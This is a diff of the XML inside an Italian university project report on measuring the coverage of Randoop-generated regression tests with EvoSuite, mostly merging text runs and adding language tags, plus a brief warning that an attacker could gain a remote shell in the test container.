-        </w:rPr>
-        <w:t>RegressionTest_it1_livello2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sono test suite.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>Ad ogni test suite corrisponde una serie di test, che è possibile riconoscere aggiungendo cifre dopo "Test" nel nome della test suite</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>, ad esempio “</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>RegressionTest_it0_livello1_it1_livello2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> usa come test </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>RegressionTest0_it0_livello1_it1_livello2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e nient'altro</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>, mentre “</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>RegressionTest_it1_livello2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> usa come test </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>RegressionTest0_it1_livello2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>RegressionTest1_it1_livello2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Per </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">far </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>si</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> che questi test </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>Randoop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fossero effettivamente utilizzabili dal misuratore </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>EvoSuite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, è stato </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">quindi </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">necessario effettuare </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">delle </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>elaborazion</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">i. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>In particolare</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">è stato realizzato uno script </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>python</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>“T8-G21-main/Progetto_SAD_GRUPPO21_TASK8/utente/randoop_coverage.py”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>“T8-G21-main/Progetto_SAD_GRUPPO21_TASK8/utente/randoop_coverage.py”.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -14596,19 +14530,7 @@
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t xml:space="preserve">, le uniche differenze riguardano il fatto che le informazioni sono estratte da un file csv (invece che xml), e che le metriche di copertura di interesse sono </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>WAEKMUTATION e CBRANCH</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (invece di LINE e BLOCK)</w:t>
+        <w:t>, le uniche differenze riguardano il fatto che le informazioni sono estratte da un file csv (invece che xml), e che le metriche di copertura di interesse sono WAEKMUTATION e CBRANCH (invece di LINE e BLOCK)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14620,31 +14542,7 @@
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t xml:space="preserve">Di seguito è mostrato l’output del report (contenuto anche nel </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">file </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>randoop_report_evosuite_coverage.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>txt</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>Di seguito è mostrato l’output del report (contenuto anche nel file randoop_report_evosuite_coverage.txt)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16326,14 +16224,16 @@
           <w:color w:val="FF0000"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Cbranches</w:t>
       </w:r>
@@ -16343,6 +16243,7 @@
           <w:color w:val="FF0000"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">: [0.9302] </w:t>
       </w:r>
@@ -16354,24 +16255,27 @@
           <w:color w:val="FF0000"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VCardBean</w:t>
       </w:r>
@@ -16381,6 +16285,7 @@
           <w:color w:val="FF0000"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>: TEST PASSED</w:t>
       </w:r>
@@ -16788,25 +16693,143 @@
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Per la classe Range </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>c’è stato un errore</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in fase di calcolo della coverage tramite </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Per la </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>classe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Range </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>c’è</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>stato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> un </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>errore</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>fase</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>calcolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>della</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> coverage </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>tramite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>EvoSuite</w:t>
       </w:r>
@@ -16814,19 +16837,15 @@
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>test/java/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (test/java/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>mypackage</w:t>
       </w:r>
@@ -16834,27 +16853,15 @@
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/RegressionTest0_it1_livello2.java:56: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>error</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/RegressionTest0_it1_livello2.java:56: error: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ComparableComparator</w:t>
       </w:r>
@@ -16862,27 +16869,15 @@
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>has</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> private access in Range\n    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> has private access in Range\n    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>org.junit.Assert.assertTrue</w:t>
       </w:r>
@@ -16890,8 +16885,15 @@
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("\'" + comparator_b10 + "\' != \'" + </w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("\'" + comparator_b10 + "\' != </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\'" + </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -16919,13 +16921,7 @@
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t>));\n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">), </w:t>
+        <w:t xml:space="preserve">));\n), </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20115,991 +20111,16 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>Nei casi più gravi un attaccante può anche ottenere una shell remota e prendere il controllo totale del container che esegue i test.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="C586C0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>import</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
+        <w:t>Nei casi più gravi un attaccante può anche ottenere una shell remota e prendere il controllo totale del container che esegue i test</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (Reverse Shell)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="4EC9B0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>org</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.junit</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.Test</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="C586C0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>import</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="4EC9B0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>static</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="4EC9B0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>org</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.junit</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.Assert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>*</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
